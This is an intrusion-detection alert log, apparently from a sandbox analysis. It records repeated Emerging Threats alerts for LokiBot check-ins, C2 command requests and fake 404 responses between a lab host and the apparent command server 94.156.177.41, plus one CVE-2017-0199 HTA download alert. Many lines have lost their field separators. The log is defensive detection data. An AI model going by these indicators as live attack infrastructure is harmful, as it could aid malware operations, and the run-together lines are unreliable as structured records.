                                                                    2024-11-20T07:57:10.040363+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.22 | 49182 | TCP
                                                                    2024-11-20T07:57:10.533829+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.22 | 49183 | 94.156.177.41 | 80 | TCP
                                                                    2024-11-20T07:57:10.533829+01002025381ET MALWARE LokiBot Checkin1192.168.2.224918394.156.177.4180TCP
                                                                    2024-11-20T07:57:10.533829+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918394.156.177.4180TCP
                                                                    2024-11-20T07:57:11.112717+01002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249184192.3.243.13680TCP
                                                                    2024-11-20T07:57:11.261515+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918394.156.177.4180TCP
                                                                    2024-11-20T07:57:11.261515+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918394.156.177.4180TCP
                                                                    2024-11-20T07:57:11.268041+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249183TCP
                                                                    2024-11-20T07:57:11.427592+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918594.156.177.4180TCP
                                                                    2024-11-20T07:57:11.427592+01002025381ET MALWARE LokiBot Checkin1192.168.2.224918594.156.177.4180TCP
                                                                    2024-11-20T07:57:11.427592+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918594.156.177.4180TCP
                                                                    2024-11-20T07:57:12.155460+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918594.156.177.4180TCP
                                                                    2024-11-20T07:57:12.155460+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918594.156.177.4180TCP
                                                                    2024-11-20T07:57:12.160366+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249185TCP
                                                                    2024-11-20T07:57:12.359101+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918694.156.177.4180TCP
                                                                    2024-11-20T07:57:12.359101+01002025381ET MALWARE LokiBot Checkin1192.168.2.224918694.156.177.4180TCP
                                                                    2024-11-20T07:57:12.359101+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918694.156.177.4180TCP
                                                                    2024-11-20T07:57:13.065121+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918694.156.177.4180TCP
                                                                    2024-11-20T07:57:13.065121+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918694.156.177.4180TCP
                                                                    2024-11-20T07:57:13.070076+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249186TCP
                                                                    2024-11-20T07:57:13.469417+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918794.156.177.4180TCP
                                                                    2024-11-20T07:57:13.469417+01002025381ET MALWARE LokiBot Checkin1192.168.2.224918794.156.177.4180TCP
                                                                    2024-11-20T07:57:13.469417+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918794.156.177.4180TCP
                                                                    2024-11-20T07:57:14.190184+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918794.156.177.4180TCP
                                                                    2024-11-20T07:57:14.190184+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918794.156.177.4180TCP
                                                                    2024-11-20T07:57:14.198397+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249187TCP
                                                                    2024-11-20T07:57:14.821226+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918894.156.177.4180TCP
                                                                    2024-11-20T07:57:14.821226+01002025381ET MALWARE LokiBot Checkin1192.168.2.224918894.156.177.4180TCP
                                                                    2024-11-20T07:57:14.821226+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918894.156.177.4180TCP
                                                                    2024-11-20T07:57:15.539350+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918894.156.177.4180TCP
                                                                    2024-11-20T07:57:15.539350+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918894.156.177.4180TCP
                                                                    2024-11-20T07:57:15.544258+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249188TCP
                                                                    2024-11-20T07:57:15.719445+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918994.156.177.4180TCP
                                                                    2024-11-20T07:57:15.719445+01002025381ET MALWARE LokiBot Checkin1192.168.2.224918994.156.177.4180TCP
                                                                    2024-11-20T07:57:15.719445+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918994.156.177.4180TCP
                                                                    2024-11-20T07:57:16.455575+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918994.156.177.4180TCP
                                                                    2024-11-20T07:57:16.455575+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918994.156.177.4180TCP
                                                                    2024-11-20T07:57:16.460615+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249189TCP
                                                                    2024-11-20T07:57:16.626398+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919094.156.177.4180TCP
                                                                    2024-11-20T07:57:16.626398+01002025381ET MALWARE LokiBot Checkin1192.168.2.224919094.156.177.4180TCP
                                                                    2024-11-20T07:57:16.626398+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919094.156.177.4180TCP
                                                                    2024-11-20T07:57:17.347428+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919094.156.177.4180TCP
                                                                    2024-11-20T07:57:17.347428+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919094.156.177.4180TCP
                                                                    2024-11-20T07:57:17.352340+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249190TCP
                                                                    2024-11-20T07:57:17.507138+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919194.156.177.4180TCP
                                                                    2024-11-20T07:57:17.507138+01002025381ET MALWARE LokiBot Checkin1192.168.2.224919194.156.177.4180TCP
                                                                    2024-11-20T07:57:17.507138+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919194.156.177.4180TCP
                                                                    2024-11-20T07:57:18.217076+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919194.156.177.4180TCP
                                                                    2024-11-20T07:57:18.217076+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919194.156.177.4180TCP
                                                                    2024-11-20T07:57:18.222070+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249191TCP
                                                                    2024-11-20T07:57:18.365734+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919294.156.177.4180TCP
                                                                    2024-11-20T07:57:18.365734+01002025381ET MALWARE LokiBot Checkin1192.168.2.224919294.156.177.4180TCP
                                                                    2024-11-20T07:57:18.365734+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919294.156.177.4180TCP
                                                                    2024-11-20T07:57:19.096338+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919294.156.177.4180TCP
                                                                    2024-11-20T07:57:19.096338+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919294.156.177.4180TCP
                                                                    2024-11-20T07:57:19.101205+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249192TCP
                                                                    2024-11-20T07:57:19.253733+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919394.156.177.4180TCP
                                                                    2024-11-20T07:57:19.253733+01002025381ET MALWARE LokiBot Checkin1192.168.2.224919394.156.177.4180TCP
                                                                    2024-11-20T07:57:19.253733+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919394.156.177.4180TCP
                                                                    2024-11-20T07:57:20.092497+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919394.156.177.4180TCP
                                                                    2024-11-20T07:57:20.092497+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919394.156.177.4180TCP
                                                                    2024-11-20T07:57:20.097314+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249193TCP
                                                                    2024-11-20T07:57:20.473746+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919494.156.177.4180TCP
                                                                    2024-11-20T07:57:20.473746+01002025381ET MALWARE LokiBot Checkin1192.168.2.224919494.156.177.4180TCP
                                                                    2024-11-20T07:57:20.473746+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919494.156.177.4180TCP
                                                                    2024-11-20T07:57:21.192076+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919494.156.177.4180TCP
                                                                    2024-11-20T07:57:21.192076+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919494.156.177.4180TCP
                                                                    2024-11-20T07:57:21.197086+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249194TCP
                                                                    2024-11-20T07:57:21.599286+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919594.156.177.4180TCP
                                                                    2024-11-20T07:57:21.599286+01002025381ET MALWARE LokiBot Checkin1192.168.2.224919594.156.177.4180TCP
                                                                    2024-11-20T07:57:21.599286+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919594.156.177.4180TCP
                                                                    2024-11-20T07:57:25.322789+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919594.156.177.4180TCP
                                                                    2024-11-20T07:57:25.322789+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919594.156.177.4180TCP
                                                                    2024-11-20T07:57:25.327626+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249195TCP
                                                                    2024-11-20T07:57:25.465376+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919694.156.177.4180TCP
                                                                    2024-11-20T07:57:25.465376+01002025381ET MALWARE LokiBot Checkin1192.168.2.224919694.156.177.4180TCP
                                                                    2024-11-20T07:57:25.465376+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919694.156.177.4180TCP
                                                                    2024-11-20T07:57:26.325588+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919694.156.177.4180TCP
                                                                    2024-11-20T07:57:26.325588+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919694.156.177.4180TCP
                                                                    2024-11-20T07:57:26.330544+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249196TCP
                                                                    2024-11-20T07:57:26.474558+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919794.156.177.4180TCP
                                                                    2024-11-20T07:57:26.474558+01002025381ET MALWARE LokiBot Checkin1192.168.2.224919794.156.177.4180TCP
                                                                    2024-11-20T07:57:26.474558+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919794.156.177.4180TCP
                                                                    2024-11-20T07:57:27.207355+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919794.156.177.4180TCP
                                                                    2024-11-20T07:57:27.207355+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919794.156.177.4180TCP
                                                                    2024-11-20T07:57:27.212143+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249197TCP
                                                                    2024-11-20T07:57:27.353742+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919894.156.177.4180TCP
                                                                    2024-11-20T07:57:27.353742+01002025381ET MALWARE LokiBot Checkin1192.168.2.224919894.156.177.4180TCP
                                                                    2024-11-20T07:57:27.353742+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919894.156.177.4180TCP
                                                                    2024-11-20T07:57:28.068992+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919894.156.177.4180TCP
                                                                    2024-11-20T07:57:28.068992+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919894.156.177.4180TCP
                                                                    2024-11-20T07:57:28.073862+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249198TCP
                                                                    2024-11-20T07:57:28.253668+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919994.156.177.4180TCP
                                                                    2024-11-20T07:57:28.253668+01002025381ET MALWARE LokiBot Checkin1192.168.2.224919994.156.177.4180TCP
                                                                    2024-11-20T07:57:28.253668+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919994.156.177.4180TCP
                                                                    2024-11-20T07:57:28.977622+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919994.156.177.4180TCP
                                                                    2024-11-20T07:57:28.977622+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919994.156.177.4180TCP
                                                                    2024-11-20T07:57:28.982464+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249199TCP
                                                                    2024-11-20T07:57:29.125788+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920094.156.177.4180TCP
                                                                    2024-11-20T07:57:29.125788+01002025381ET MALWARE LokiBot Checkin1192.168.2.224920094.156.177.4180TCP
                                                                    2024-11-20T07:57:29.125788+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920094.156.177.4180TCP
                                                                    2024-11-20T07:57:29.974567+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920094.156.177.4180TCP
                                                                    2024-11-20T07:57:29.974567+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920094.156.177.4180TCP
                                                                    2024-11-20T07:57:29.979437+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249200TCP
                                                                    2024-11-20T07:57:30.114920+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920194.156.177.4180TCP
                                                                    2024-11-20T07:57:30.114920+01002025381ET MALWARE LokiBot Checkin1192.168.2.224920194.156.177.4180TCP
                                                                    2024-11-20T07:57:30.114920+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920194.156.177.4180TCP
                                                                    2024-11-20T07:57:30.837963+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920194.156.177.4180TCP
                                                                    2024-11-20T07:57:30.837963+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920194.156.177.4180TCP
                                                                    2024-11-20T07:57:30.843035+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249201TCP
                                                                    2024-11-20T07:57:30.992768+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920294.156.177.4180TCP
                                                                    2024-11-20T07:57:30.992768+01002025381ET MALWARE LokiBot Checkin1192.168.2.224920294.156.177.4180TCP
                                                                    2024-11-20T07:57:30.992768+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920294.156.177.4180TCP
                                                                    2024-11-20T07:57:31.706612+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920294.156.177.4180TCP
                                                                    2024-11-20T07:57:31.706612+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920294.156.177.4180TCP
                                                                    2024-11-20T07:57:31.716016+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249202TCP
                                                                    2024-11-20T07:57:32.063042+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920394.156.177.4180TCP
                                                                    2024-11-20T07:57:32.063042+01002025381ET MALWARE LokiBot Checkin1192.168.2.224920394.156.177.4180TCP
                                                                    2024-11-20T07:57:32.063042+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920394.156.177.4180TCP
                                                                    2024-11-20T07:57:32.784000+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920394.156.177.4180TCP
                                                                    2024-11-20T07:57:32.784000+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920394.156.177.4180TCP
                                                                    2024-11-20T07:57:32.789112+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249203TCP
                                                                    2024-11-20T07:57:32.925555+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920494.156.177.4180TCP
                                                                    2024-11-20T07:57:32.925555+01002025381ET MALWARE LokiBot Checkin1192.168.2.224920494.156.177.4180TCP
                                                                    2024-11-20T07:57:32.925555+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920494.156.177.4180TCP
                                                                    2024-11-20T07:57:33.768266+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920494.156.177.4180TCP
                                                                    2024-11-20T07:57:33.768266+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920494.156.177.4180TCP
                                                                    2024-11-20T07:57:33.773092+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249204TCP
                                                                    2024-11-20T07:57:33.906030+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920594.156.177.4180TCP
                                                                    2024-11-20T07:57:33.906030+01002025381ET MALWARE LokiBot Checkin1192.168.2.224920594.156.177.4180TCP
                                                                    2024-11-20T07:57:33.906030+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920594.156.177.4180TCP
                                                                    2024-11-20T07:57:34.637117+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920594.156.177.4180TCP
                                                                    2024-11-20T07:57:34.637117+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920594.156.177.4180TCP
                                                                    2024-11-20T07:57:34.643251+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249205TCP
                                                                    2024-11-20T07:57:34.787024+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920694.156.177.4180TCP
                                                                    2024-11-20T07:57:34.787024+01002025381ET MALWARE LokiBot Checkin1192.168.2.224920694.156.177.4180TCP
                                                                    2024-11-20T07:57:34.787024+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920694.156.177.4180TCP
                                                                    2024-11-20T07:57:35.506502+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920694.156.177.4180TCP
                                                                    2024-11-20T07:57:35.506502+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920694.156.177.4180TCP
                                                                    2024-11-20T07:57:35.511423+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249206TCP
                                                                    2024-11-20T07:57:35.655030+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920794.156.177.4180TCP
                                                                    2024-11-20T07:57:35.655030+01002025381ET MALWARE LokiBot Checkin1192.168.2.224920794.156.177.4180TCP
                                                                    2024-11-20T07:57:35.655030+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920794.156.177.4180TCP
                                                                    2024-11-20T07:57:36.385030+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920794.156.177.4180TCP
                                                                    2024-11-20T07:57:36.385030+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920794.156.177.4180TCP
                                                                    2024-11-20T07:57:36.389874+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249207TCP
                                                                    2024-11-20T07:57:36.530041+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920894.156.177.4180TCP
                                                                    2024-11-20T07:57:36.530041+01002025381ET MALWARE LokiBot Checkin1192.168.2.224920894.156.177.4180TCP
                                                                    2024-11-20T07:57:36.530041+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920894.156.177.4180TCP
                                                                    2024-11-20T07:57:37.244067+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920894.156.177.4180TCP
                                                                    2024-11-20T07:57:37.244067+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920894.156.177.4180TCP
                                                                    2024-11-20T07:57:37.249204+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249208TCP
                                                                    2024-11-20T07:57:37.385969+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920994.156.177.4180TCP
                                                                    2024-11-20T07:57:37.385969+01002025381ET MALWARE LokiBot Checkin1192.168.2.224920994.156.177.4180TCP
2024-11-20T07:57:37.385969+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.22 | 49209 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:38.096012+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.22 | 49209 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:38.096012+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.22 | 49209 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:38.100844+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.22 | 49209 | TCP
2024-11-20T07:57:38.245541+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.22 | 49210 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:38.245541+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.22 | 49210 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:38.245541+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.22 | 49210 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:38.955955+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.22 | 49210 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:38.955955+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.22 | 49210 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:38.960823+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.22 | 49210 | TCP
2024-11-20T07:57:39.100304+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.22 | 49211 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:39.100304+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.22 | 49211 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:39.100304+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.22 | 49211 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:39.954333+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.22 | 49211 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:39.954333+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.22 | 49211 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:39.959250+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.22 | 49211 | TCP
2024-11-20T07:57:40.099524+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.22 | 49212 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:40.099524+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.22 | 49212 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:40.099524+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.22 | 49212 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:40.816303+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.22 | 49212 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:40.816303+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.22 | 49212 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:40.821148+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.22 | 49212 | TCP
2024-11-20T07:57:40.957522+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.22 | 49213 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:40.957522+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.22 | 49213 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:40.957522+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.22 | 49213 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:41.675988+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.22 | 49213 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:41.675988+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.22 | 49213 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:41.680888+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.22 | 49213 | TCP
2024-11-20T07:57:41.834157+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.22 | 49214 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:41.834157+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.22 | 49214 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:41.834157+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.22 | 49214 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:42.543644+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.22 | 49214 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:42.543644+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.22 | 49214 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:42.548514+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.22 | 49214 | TCP
2024-11-20T07:57:42.690842+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.22 | 49215 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:42.690842+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.22 | 49215 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:42.690842+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.22 | 49215 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:43.545186+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.22 | 49215 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:43.545186+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.22 | 49215 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:43.550061+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.22 | 49215 | TCP
2024-11-20T07:57:43.687015+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.22 | 49216 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:43.687015+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.22 | 49216 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:43.687015+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.22 | 49216 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:44.541694+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.22 | 49216 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:44.541694+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.22 | 49216 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:44.546679+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.22 | 49216 | TCP
2024-11-20T07:57:44.686743+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.22 | 49217 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:44.686743+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.22 | 49217 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:44.686743+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.22 | 49217 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:45.533689+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.22 | 49217 | 94.156.177.41 | 80 | TCP
